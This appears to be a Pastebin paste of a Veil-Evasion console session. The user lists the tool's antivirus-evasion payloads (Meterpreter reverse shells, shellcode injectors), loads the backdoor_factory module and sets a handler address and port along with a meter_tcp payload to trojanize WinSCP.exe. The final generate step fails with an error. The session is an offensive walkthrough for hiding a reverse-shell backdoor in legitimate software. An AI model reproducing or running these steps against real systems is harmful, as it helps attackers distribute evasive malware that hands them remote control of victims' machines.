Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =========================================================================
- Veil-Evasion | [Version]: 2.19.1
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- Main Menu
- 41 payloads loaded
- Available commands:
- use use a specific payload
- info information on a specific payload
- list list available payloads
- update update Veil to the latest version
- clean clean out payload folders
- checkvt check payload hashes vs. VirusTotal
- exit exit Veil
- [>] Please enter a command: list
- =========================================================================
- Veil-Evasion | [Version]: 2.19.1
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- [*] Available payloads:
- 1) auxiliary/coldwar_wrapper
- 2) auxiliary/pyinstaller_wrapper
- 3) c/meterpreter/rev_http
- 4) c/meterpreter/rev_http_service
- 5) c/meterpreter/rev_tcp
- 6) c/meterpreter/rev_tcp_service
- 7) c/shellcode_inject/flatc
- 8) cs/meterpreter/rev_http
- 9) cs/meterpreter/rev_https
- 10) cs/meterpreter/rev_tcp
- 11) cs/shellcode_inject/base64_substitution
- 12) cs/shellcode_inject/virtual
- 13) native/Hyperion
- 14) native/backdoor_factory
- 15) native/pe_scrambler
- 16) powershell/meterpreter/rev_http
- 17) powershell/meterpreter/rev_https
- 18) powershell/meterpreter/rev_tcp
- 19) powershell/shellcode_inject/download_virtual
- 20) powershell/shellcode_inject/psexec_virtual
- 21) powershell/shellcode_inject/virtual
- 22) python/meterpreter/bind_tcp
- 23) python/meterpreter/rev_http
- 24) python/meterpreter/rev_http_contained
- 25) python/meterpreter/rev_https
- 26) python/meterpreter/rev_https_contained
- 27) python/meterpreter/rev_tcp
- 28) python/shellcode_inject/aes_encrypt
- 29) python/shellcode_inject/arc_encrypt
- 30) python/shellcode_inject/base64_substitution
- 31) python/shellcode_inject/des_encrypt
- 32) python/shellcode_inject/download_inject
- 33) python/shellcode_inject/flat
- 34) python/shellcode_inject/letter_substitution
- 35) python/shellcode_inject/pidinject
- 36) ruby/meterpreter/rev_http
- 37) ruby/meterpreter/rev_http_contained
- 38) ruby/meterpreter/rev_https
- 39) ruby/meterpreter/rev_https_contained
- 40) ruby/meterpreter/rev_tcp
- 41) ruby/shellcode_inject/flat
- [>] Please enter a command: use 14
- =========================================================================
- Veil-Evasion | [Version]: 2.19.1
- =========================================================================
- [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
- =========================================================================
- Payload: native/backdoor_factory loaded
- Required Options:
- Name Current Value Description
- ---- ------------- -----------
- LHOST 127.0.0.1 IP of the metasploit handler
- LPORT 4444 Port of the metasploit handler
- PATCH_METHOD Automatic Either Manual or Automatic. For use with payloads that have *_threaded in the name
- orig_exe WinSCP.exe PE or ELF executable to run through the Backdoor Factory
- payload reverse_tcp_stager_threaded PE or ELF: meter_tcp, rev_shell, custom | PE only meter_https
- Available commands:
- set set a specific option value
- info show information about the payload
- generate generate payload
- back go to the main menu
- exit exit Veil
- [>] Please enter a command: set LHOST 192.168.1.58
- [>] Please enter a command: set LPORT 4444
- [>] Please enter a command: set payload meter_tcp
- [>] Please enter a command: generate
- [*] Running The Backdoor Factory...
- [*] In the backdoor module
- [*] Checking if binary is supported
- [*] Gathering file info
- [*] Reading win32 entry instructions
- The following backdoors are available: (use -s)
- cave_miner_inline
- iat_reverse_tcp_inline
- iat_reverse_tcp_inline_threaded
- iat_reverse_tcp_stager_threaded
- iat_user_supplied_shellcode_threaded
- meterpreter_reverse_https_threaded
- reverse_shell_tcp_inline
- reverse_tcp_stager_threaded
- user_supplied_shellcode_threaded
- Error during The Backdoor Factory execution
- [>] Press any key to return to the main menu:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement